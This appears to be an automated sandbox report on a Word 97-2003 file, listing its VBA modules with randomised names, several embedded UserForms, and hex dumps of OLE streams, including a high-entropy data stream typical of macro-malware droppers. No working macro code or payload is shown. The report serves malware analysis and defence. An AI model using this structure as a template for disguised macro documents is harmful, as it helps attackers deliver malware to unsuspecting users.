                                                                                                                        VBA Code Keywords

                                                                                                                        Keyword
                                                                                                                        False
                                                                                                                        VB_Exposed
                                                                                                                        Attribute
                                                                                                                        VB_Name
                                                                                                                        VB_Creatable
                                                                                                                        VB_PredeclaredId
                                                                                                                        VB_GlobalNameSpace
                                                                                                                        VB_Base
                                                                                                                        VB_Customizable
                                                                                                                        VB_TemplateDerived
                                                                                                                        VBA Code
                                                                                                                        Attribute VB_Name = "Z4lx7rwdfqe"
Attribute VB_Base = "0{D653B320-315E-4E0C-911D-6D22FF9BBBB9}{4825E711-FDA9-4AF6-8927-627BF1AB5E27}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
                                                                                                                        VBA File Name: Y6lmxng9ukvy69c, Stream Size: -1
                                                                                                                        General
                                                                                                                        Stream Path:Macros/Y6lmxng9ukvy69c
                                                                                                                        VBA File Name:Y6lmxng9ukvy69c
                                                                                                                        Stream Size:-1
                                                                                                                        Data ASCII:
                                                                                                                        Data Raw:

                                                                                                                        VBA Code Keywords

                                                                                                                        Keyword
                                                                                                                        False
                                                                                                                        VB_Exposed
                                                                                                                        Attribute
                                                                                                                        VB_Name
                                                                                                                        VB_Creatable
                                                                                                                        VB_PredeclaredId
                                                                                                                        VB_GlobalNameSpace
                                                                                                                        VB_Base
                                                                                                                        VB_Customizable
                                                                                                                        VB_TemplateDerived
                                                                                                                        VBA Code
                                                                                                                        Attribute VB_Name = "Y6lmxng9ukvy69c"
Attribute VB_Base = "0{E341BE8E-52D5-48DE-84A6-3AE19C883DEE}{F6993466-D5CC-4E31-AC79-155044703F1F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
                                                                                                                        VBA File Name: Z4lx7rwdfqe, Stream Size: -1
                                                                                                                        General
                                                                                                                        Stream Path:Macros/Z4lx7rwdfqe
                                                                                                                        VBA File Name:Z4lx7rwdfqe
                                                                                                                        Stream Size:-1
                                                                                                                        Data ASCII:
                                                                                                                        Data Raw:

                                                                                                                        VBA Code Keywords

                                                                                                                        Keyword
                                                                                                                        False
                                                                                                                        VB_Exposed
                                                                                                                        Attribute
                                                                                                                        VB_Name
                                                                                                                        VB_Creatable
                                                                                                                        VB_PredeclaredId
                                                                                                                        VB_GlobalNameSpace
                                                                                                                        VB_Base
                                                                                                                        VB_Customizable
                                                                                                                        VB_TemplateDerived
                                                                                                                        VBA Code
                                                                                                                        Attribute VB_Name = "Z4lx7rwdfqe"
Attribute VB_Base = "0{D653B320-315E-4E0C-911D-6D22FF9BBBB9}{4825E711-FDA9-4AF6-8927-627BF1AB5E27}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

                                                                                                                        Streams

                                                                                                                        Stream Path: \x1CompObj, File Type: data, Stream Size: 121
                                                                                                                        General
                                                                                                                        Stream Path:\x1CompObj
                                                                                                                        File Type:data
                                                                                                                        Stream Size:121
                                                                                                                        Entropy:4.36374049783
                                                                                                                        Base64 Encoded:True
                                                                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F ' . . . M i c r o s o f t O f f i c e W o r d 9 7 - 2 0 0 3 D o c u m e n t . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q . . . . . . . . . . . .
                                                                                                                        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 27 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 57 6f 72 64 20 39 37 2d 32 30 30 33 20 44 6f 63 75 6d 65 6e 74 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                        Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                        General
                                                                                                                        Stream Path:\x5DocumentSummaryInformation
                                                                                                                        File Type:data
                                                                                                                        Stream Size:4096
                                                                                                                        Entropy:0.24979504615
                                                                                                                        Base64 Encoded:False
                                                                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ; . . . . . . . y s . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                        Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e8 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00
                                                                                                                        Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 500
                                                                                                                        General
                                                                                                                        Stream Path:\x5SummaryInformation
                                                                                                                        File Type:data
                                                                                                                        Stream Size:500
                                                                                                                        Entropy:3.89573432818
                                                                                                                        Base64 Encoded:False
                                                                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . h . . . . . . . T . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 0 . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N o r m a l . d o t m .
                                                                                                                        Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 c4 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 68 01 00 00 04 00 00 00 54 01 00 00 05 00 00 00 a4 00 00 00 06 00 00 00 b0 00 00 00 07 00 00 00 bc 00 00 00 08 00 00 00 40 01 00 00 09 00 00 00 d0 00 00 00
                                                                                                                        Stream Path: 1Table, File Type: data, Stream Size: 6493
                                                                                                                        General
                                                                                                                        Stream Path:1Table
                                                                                                                        File Type:data
                                                                                                                        Stream Size:6493
                                                                                                                        Entropy:6.02867552772
                                                                                                                        Base64 Encoded:True
                                                                                                                        Data ASCII:f . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
                                                                                                                        Data Raw:66 04 11 00 12 00 01 00 0b 01 0f 00 07 00 03 00 00 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
                                                                                                                        Stream Path: Data, File Type: data, Stream Size: 99183
                                                                                                                        General
                                                                                                                        Stream Path:Data
                                                                                                                        File Type:data
                                                                                                                        Stream Size:99183
                                                                                                                        Entropy:7.3896106865
                                                                                                                        Base64 Encoded:True
                                                                                                                        Data ASCII:o . . . D . d . . . . . . . . . . . . . . . . . . . . . J F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . . . A . . . . . . . . . . ? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . i . c . t . u . r . e . . 1 . . . . . . . . . . . . . . . R . . . . . . . . . a ? s . . A . K . . . . 2 . . . . . . . . . . . . . D . . . . . . . . F . . . . . . a ? s . . A . K . . . . 2 . . . . . . . . .
                                                                                                                        Data Raw:6f 83 01 00 44 00 64 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 4a 46 ef 1f 08 02 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 6a 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 83 00 0b f0 46 00 00 00 bf 00 04 00 04 00 04 41 01 00 00 00 05 c1 02 00 00 00 3f 01 00 00 06 00 bf 01 00 00
                                                                                                                        Stream Path: Macros/Bj7zc5k612ib/\x1CompObj, File Type: data, Stream Size: 97
                                                                                                                        General
                                                                                                                        Stream Path:Macros/Bj7zc5k612ib/\x1CompObj
                                                                                                                        File Type:data
                                                                                                                        Stream Size:97
                                                                                                                        Entropy:3.61064918306
                                                                                                                        Base64 Encoded:False
                                                                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
                                                                                                                        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                        Stream Path: Macros/Bj7zc5k612ib/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 268
                                                                                                                        General
                                                                                                                        Stream Path:Macros/Bj7zc5k612ib/\x3VBFrame
                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                        Stream Size:268
                                                                                                                        Entropy:4.71468555208
                                                                                                                        Base64 Encoded:True
                                                                                                                        Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } B j 7 z c 5 k 6 1 2 i b . . C a p t i o n = " U s e r F o r m 1 " . . C l i e n t H e i g h t = 3 1 6 5 . . C l i e n t L e f t = 4 5 . . C l i e n t T o p = 3 9 0 . . C l i e n t W i d t h = 4 7 1 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r
                                                                                                                        Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 42 6a 37 7a 63 35 6b 36 31 32 69 62 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 31 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20
                                                                                                                        Stream Path: Macros/Bj7zc5k612ib/f, File Type: data, Stream Size: 38
                                                                                                                        General
                                                                                                                        Stream Path:Macros/Bj7zc5k612ib/f
                                                                                                                        File Type:data
                                                                                                                        Stream Size:38
                                                                                                                        Entropy:1.54052096453
                                                                                                                        Base64 Encoded:False
                                                                                                                        Data ASCII:. . . . . . . . . } . . t . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                        Data Raw:00 04 18 00 00 0c 00 08 00 7d 00 00 74 20 00 00 cf 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                        Stream Path: Macros/Bj7zc5k612ib/o, File Type: empty, Stream Size: 0
                                                                                                                        General
                                                                                                                        Stream Path:Macros/Bj7zc5k612ib/o
                                                                                                                        File Type:empty
                                                                                                                        Stream Size:0
                                                                                                                        Entropy:0.0
                                                                                                                        Base64 Encoded:False
                                                                                                                        Data ASCII:
                                                                                                                        Data Raw:
                                                                                                                        Stream Path: Macros/Hiuk_v7ho95scpn0j/\x1CompObj, File Type: data, Stream Size: 97
                                                                                                                        General
                                                                                                                        Stream Path:Macros/Hiuk_v7ho95scpn0j/\x1CompObj
                                                                                                                        File Type:data
                                                                                                                        Stream Size:97
                                                                                                                        Entropy:3.61064918306
                                                                                                                        Base64 Encoded:False
                                                                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
                                                                                                                        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                        Stream Path: Macros/Hiuk_v7ho95scpn0j/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 273
                                                                                                                        General
                                                                                                                        Stream Path:Macros/Hiuk_v7ho95scpn0j/\x3VBFrame
                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                        Stream Size:273
                                                                                                                        Entropy:4.74474576963
                                                                                                                        Base64 Encoded:True
                                                                                                                        Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } H i u k _ v 7 h o 9 5 s c p n 0 j . . C a p t i o n = " U s e r F o r m 1 " . . C l i e n t H e i g h t = 3 1 6 5 . . C l i e n t L e f t = 4 5 . . C l i e n t T o p = 3 9 0 . . C l i e n t W i d t h = 4 7 1 0 . . S t a r t U p P o s i t i o n = 1 ' C
                                                                                                                        Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 48 69 75 6b 5f 76 37 68 6f 39 35 73 63 70 6e 30 6a 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 31 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67
                                                                                                                        Stream Path: Macros/Hiuk_v7ho95scpn0j/f, File Type: data, Stream Size: 38
                                                                                                                        General
                                                                                                                        Stream Path:Macros/Hiuk_v7ho95scpn0j/f
                                                                                                                        File Type:data
                                                                                                                        Stream Size:38
                                                                                                                        Entropy:1.54052096453
                                                                                                                        Base64 Encoded:False
                                                                                                                        Data ASCII:. . . . . . . . . } . . t . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                        Data Raw:00 04 18 00 00 0c 00 08 00 7d 00 00 74 20 00 00 cf 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                        Stream Path: Macros/Hiuk_v7ho95scpn0j/o, File Type: empty, Stream Size: 0
                                                                                                                        General
                                                                                                                        Stream Path:Macros/Hiuk_v7ho95scpn0j/o
                                                                                                                        File Type:empty
                                                                                                                        Stream Size:0
                                                                                                                        Entropy:0.0
                                                                                                                        Base64 Encoded:False
                                                                                                                        Data ASCII:
                                                                                                                        Data Raw:
                                                                                                                        Stream Path: Macros/Hvp1hxwgx78q8fg4/\x1CompObj, File Type: data, Stream Size: 97
                                                                                                                        General
                                                                                                                        Stream Path:Macros/Hvp1hxwgx78q8fg4/\x1CompObj
                                                                                                                        File Type:data
                                                                                                                        Stream Size:97
                                                                                                                        Entropy:3.61064918306
                                                                                                                        Base64 Encoded:False
                                                                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
                                                                                                                        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                        Stream Path: Macros/Hvp1hxwgx78q8fg4/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 272
                                                                                                                        General
                                                                                                                        Stream Path:Macros/Hvp1hxwgx78q8fg4/\x3VBFrame
                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                        Stream Size:272
                                                                                                                        Entropy:4.74008432928
                                                                                                                        Base64 Encoded:True
                                                                                                                        Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } H v p 1 h x w g x 7 8 q 8 f g 4 . . C a p t i o n = " U s e r F o r m 1 " . . C l i e n t H e i g h t = 3 1 6 5 . . C l i e n t L e f t = 4 5 . . C l i e n t T o p = 3 9 0 . . C l i e n t W i d t h = 4 7 1 0 . . S t a r t U p P o s i t i o n = 1 ' C e
                                                                                                                        Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 48 76 70 31 68 78 77 67 78 37 38 71 38 66 67 34 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 31 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68
                                                                                                                        Stream Path: Macros/Hvp1hxwgx78q8fg4/f, File Type: data, Stream Size: 38
                                                                                                                        General
                                                                                                                        Stream Path:Macros/Hvp1hxwgx78q8fg4/f
                                                                                                                        File Type:data
                                                                                                                        Stream Size:38
                                                                                                                        Entropy:1.54052096453
                                                                                                                        Base64 Encoded:False
                                                                                                                        Data ASCII:. . . . . . . . . } . . t . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                        Data Raw:00 04 18 00 00 0c 00 08 00 7d 00 00 74 20 00 00 cf 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                        Stream Path: Macros/Hvp1hxwgx78q8fg4/o, File Type: empty, Stream Size: 0
                                                                                                                        General
                                                                                                                        Stream Path:Macros/Hvp1hxwgx78q8fg4/o
                                                                                                                        File Type:empty
                                                                                                                        Stream Size:0
                                                                                                                        Entropy:0.0
                                                                                                                        Base64 Encoded:False
                                                                                                                        Data ASCII:
                                                                                                                        Data Raw:
                                                                                                                        Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 1195
                                                                                                                        General
                                                                                                                        Stream Path:Macros/PROJECT
                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                        Stream Size:1195
                                                                                                                        Entropy:5.43785559038
                                                                                                                        Base64 Encoded:True
                                                                                                                        Data ASCII:I D = " { D 1 C 3 0 D 1 1 - A 0 4 1 - 4 8 D F - 9 2 F A - 8 5 F 9 7 F 3 3 9 D F B } " . . D o c u m e n t = N t x 3 x l e 2 g j t 1 / & H 0 0 0 0 0 0 0 0 . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . B a s e C l a s s = Z 4 l x 7 r w d f q e . . B a s e C l a s s = B j 7 z c 5 k 6 1 2 i b . . B a s e C l a s s = H v p 1 h x w g x 7 8 q 8 f g 4 . . B a s e C l a s s = U 2 v 6 a y d k x z 3 . . B a s e C l a s s = H i u k _ v 7 h o 9 5 s c p n 0 j . . B a
                                                                                                                        Data Raw:49 44 3d 22 7b 44 31 43 33 30 44 31 31 2d 41 30 34 31 2d 34 38 44 46 2d 39 32 46 41 2d 38 35 46 39 37 46 33 33 39 44 46 42 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 4e 74 78 33 78 6c 65 32 67 6a 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 50 61 63 6b 61 67 65 3d 7b 41 43 39 46 32 46 39 30 2d 45 38 37 37 2d 31 31 43 45 2d 39 46 36 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 0d 0a 42
                                                                                                                        Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 485
                                                                                                                        General
                                                                                                                        Stream Path:Macros/PROJECTwm
                                                                                                                        File Type:data
                                                                                                                        Stream Size:485
                                                                                                                        Entropy:4.2650598546
                                                                                                                        Base64 Encoded:False
                                                                                                                        Data ASCII:N t x 3 x l e 2 g j t 1 . N . t . x . 3 . x . l . e . 2 . g . j . t . 1 . . . Z 4 l x 7 r w d f q e . Z . 4 . l . x . 7 . r . w . d . f . q . e . . . B j 7 z c 5 k 6 1 2 i b . B . j . 7 . z . c . 5 . k . 6 . 1 . 2 . i . b . . . H v p 1 h x w g x 7 8 q 8 f g 4 . H . v . p . 1 . h . x . w . g . x . 7 . 8 . q . 8 . f . g . 4 . . . U 2 v 6 a y d k x z 3 . U . 2 . v . 6 . a . y . d . k . x . z . 3 . . . H i u k _ v 7 h o 9 5 s c p n 0 j . H . i . u . k . _ . v . 7 . h . o . 9 . 5 . s . c . p . n . 0 . j . . . S
                                                                                                                        Data Raw:4e 74 78 33 78 6c 65 32 67 6a 74 31 00 4e 00 74 00 78 00 33 00 78 00 6c 00 65 00 32 00 67 00 6a 00 74 00 31 00 00 00 5a 34 6c 78 37 72 77 64 66 71 65 00 5a 00 34 00 6c 00 78 00 37 00 72 00 77 00 64 00 66 00 71 00 65 00 00 00 42 6a 37 7a 63 35 6b 36 31 32 69 62 00 42 00 6a 00 37 00 7a 00 63 00 35 00 6b 00 36 00 31 00 32 00 69 00 62 00 00 00 48 76 70 31 68 78 77 67 78 37 38 71 38 66
                                                                                                                        Stream Path: Macros/Pkebr_y5xjd5hl070/\x1CompObj, File Type: data, Stream Size: 97
                                                                                                                        General
                                                                                                                        Stream Path:Macros/Pkebr_y5xjd5hl070/\x1CompObj
                                                                                                                        File Type:data
                                                                                                                        Stream Size:97
                                                                                                                        Entropy:3.61064918306
                                                                                                                        Base64 Encoded:False
                                                                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
                                                                                                                        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                        Stream Path: Macros/Pkebr_y5xjd5hl070/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 273
                                                                                                                        General
                                                                                                                        Stream Path:Macros/Pkebr_y5xjd5hl070/\x3VBFrame
                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                        Stream Size:273
                                                                                                                        Entropy:4.74186533966
                                                                                                                        Base64 Encoded:True
                                                                                                                        Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } P k e b r _ y 5 x j d 5 h l 0 7 0 . . C a p t i o n = " U s e r F o r m 1 " . . C l i e n t H e i g h t = 3 1 6 5 . . C l i e n t L e f t = 4 5 . . C l i e n t T o p = 3 9 0 . . C l i e n t W i d t h = 4 7 1 0 . . S t a r t U p P o s i t i o n = 1 ' C
                                                                                                                        Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 50 6b 65 62 72 5f 79 35 78 6a 64 35 68 6c 30 37 30 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 31 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67
                                                                                                                        Stream Path: Macros/Pkebr_y5xjd5hl070/f, File Type: data, Stream Size: 38
                                                                                                                        General
                                                                                                                        Stream Path:Macros/Pkebr_y5xjd5hl070/f
                                                                                                                        File Type:data
                                                                                                                        Stream Size:38
                                                                                                                        Entropy:1.54052096453
                                                                                                                        Base64 Encoded:False
                                                                                                                        Data ASCII:. . . . . . . . . } . . t . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                        Data Raw:00 04 18 00 00 0c 00 08 00 7d 00 00 74 20 00 00 cf 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                        Stream Path: Macros/Pkebr_y5xjd5hl070/o, File Type: empty, Stream Size: 0
                                                                                                                        General
                                                                                                                        Stream Path:Macros/Pkebr_y5xjd5hl070/o
                                                                                                                        File Type:empty
                                                                                                                        Stream Size:0
                                                                                                                        Entropy:0.0
                                                                                                                        Base64 Encoded:False
                                                                                                                        Data ASCII:
                                                                                                                        Data Raw:
                                                                                                                        Stream Path: Macros/Seby_rq4k8mp/\x1CompObj, File Type: data, Stream Size: 97
                                                                                                                        General
                                                                                                                        Stream Path:Macros/Seby_rq4k8mp/\x1CompObj
                                                                                                                        File Type:data
                                                                                                                        Stream Size:97
                                                                                                                        Entropy:3.61064918306
                                                                                                                        Base64 Encoded:False
                                                                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
                                                                                                                        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                        Stream Path: Macros/Seby_rq4k8mp/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 268
                                                                                                                        General
                                                                                                                        Stream Path:Macros/Seby_rq4k8mp/\x3VBFrame
                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                        Stream Size:268
                                                                                                                        Entropy:4.71722873732
                                                                                                                        Base64 Encoded:True
                                                                                                                        Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } S e b y _ r q 4 k 8 m p . . C a p t i o n = " U s e r F o r m 1 " . . C l i e n t H e i g h t = 3 1 6 5 . . C l i e n t L e f t = 4 5 . . C l i e n t T o p = 3 9 0 . . C l i e n t W i d t h = 4 7 1 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r
